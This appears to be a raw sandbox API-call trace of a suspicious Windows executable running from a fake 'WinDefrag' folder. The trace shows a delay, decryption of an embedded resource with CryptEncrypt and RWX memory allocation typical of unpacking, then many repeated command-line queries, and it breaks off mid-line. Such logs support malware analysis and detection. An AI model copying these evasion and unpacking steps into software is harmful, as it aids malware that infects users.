0x0 [0230.457] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAaaaaa") returned 0xc013 [0230.457] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x28fc5c, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAaaaa") returned 0x3f [0230.457] ReleaseMutex (hMutex=0x4c) returned 1 [0230.457] CloseHandle (hObject=0x4c) returned 1 [0230.457] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0230.457] GetCurrentThreadId () returned 0x67c [0230.457] WaitForSingleObject (hHandle=0x40, dwMilliseconds=0xffffffff) returned 0x0 [0230.457] GetCurrentThreadId () returned 0x67c [0230.457] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0230.457] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x4c [0230.457] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0230.457] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.457] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAaAAaa") returned 0xc014 [0230.458] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAaAAa") returned 0x45 [0230.458] ReleaseMutex (hMutex=0x4c) returned 1 [0230.458] CloseHandle (hObject=0x4c) returned 1 [0230.458] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0230.458] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x4c [0230.458] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0230.458] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.458] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAAaAaa") returned 0xc015 [0230.458] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAAaaaaAaaAAaAAaAa") returned 0x45 [0230.458] ReleaseMutex (hMutex=0x4c) returned 1 [0230.458] CloseHandle (hObject=0x4c) returned 1 [0230.459] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0230.459] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x4c [0230.459] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0230.459] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.459] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAAaAAaaAAaaAAaAaaa") returned 0xc016 [0230.459] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAAaAAaaAAaaAAaAaa") returned 0x46 [0230.459] ReleaseMutex (hMutex=0x4c) returned 1 [0230.459] CloseHandle (hObject=0x4c) returned 1 [0230.459] ReleaseSemaphore (in: hSemaphore=0x40, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0230.459] ReleaseSemaphore (in: hSemaphore=0x3c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0230.459] ReleaseSemaphore (in: hSemaphore=0x2c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0230.459] CloseHandle (hObject=0x2c) returned 1 [0230.459] GetLastError () returned 0x0 [0230.459] SetLastError (dwErrCode=0x0) [0230.459] GetLastError () returned 0x0 [0230.459] SetLastError (dwErrCode=0x0) [0230.459] Sleep (dwMilliseconds=0x3a98) [0240.469] FindResourceA (hModule=0x0, lpName=0x65, lpType="FILMS") returned 0x423190 [0240.473] LoadResource (hModule=0x0, hResInfo=0x423190) returned 0x42322c [0240.473] SizeofResource (hModule=0x0, hResInfo=0x423190) returned 0x3e400 [0240.473] LockResource (hResData=0x42322c) returned 0x42322c [0240.478] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0240.478] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0240.478] VirtualAlloc (lpAddress=0x0, dwSize=0xe4f, flAllocationType=0x1000, flProtect=0x40) returned 0x2a0000 [0240.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0240.484] GetProcAddress (hModule=0x76490000, lpProcName="CryptAcquireContextA") returned 0x764991dd [0240.484] GetProcAddress (hModule=0x76490000, lpProcName="CryptImportKey") returned 0x7649c532 [0240.484] GetProcAddress (hModule=0x76490000, lpProcName="CryptEncrypt") returned 0x764b779b [0240.484] CryptAcquireContextA (in: phProv=0x28fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x28fde8*=0x0) returned 0 [0240.525] CryptAcquireContextA (in: phProv=0x28fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x28fde8*=0x4e3500) returned 1 [0240.638] CryptImportKey (in: hProv=0x4e3500, pbData=0x28fc14, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x28fc00 | out: phKey=0x28fc00*=0x4f8870) returned 1 [0240.648] CryptImportKey (in: hProv=0x4e3500, pbData=0x28fd60, dwDataLen=0x4c, hPubKey=0x4f8870, dwFlags=0x0, phKey=0x28fbfc | out: phKey=0x28fbfc*=0x4f8b10) returned 1 [0240.648] CryptEncrypt (in: hKey=0x4f8b10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d0048*, pdwDataLen=0x28fe74*=0x3e400, dwBufLen=0x3e400 | out: pbData=0x5d0048*, pdwDataLen=0x28fe74*=0x3e400) returned 1 [0240.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2b4, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000 [0240.649] GetLastError () returned 0x3f0 [0240.649] SetLastError (dwErrCode=0x3f0) [0240.649] GetLastError () returned 0x3f0 [0240.649] SetLastError (dwErrCode=0x3f0) [0240.649] _findfirst (param_1="KLVBE.bin", param_2=0x28fce4) returned 0xffffffff [0240.650] GetLastError () returned 0x2 [0240.650] SetLastError (dwErrCode=0x2) [0240.650] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x40) returned 0x13a0000 [0240.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x76b00000 [0240.658] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77e20000 [0240.661] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x75c60000 [0240.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0240.664] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75cf0000 [0240.664] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.665] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.665] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.666] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.666] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.667] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.667] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.668] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.668] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.669] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.669] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.670] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.670] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.671] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.672] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.672] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.673] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.674] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.674] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.675] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.675] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.676] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.676] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0240.677] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " [0240.677] 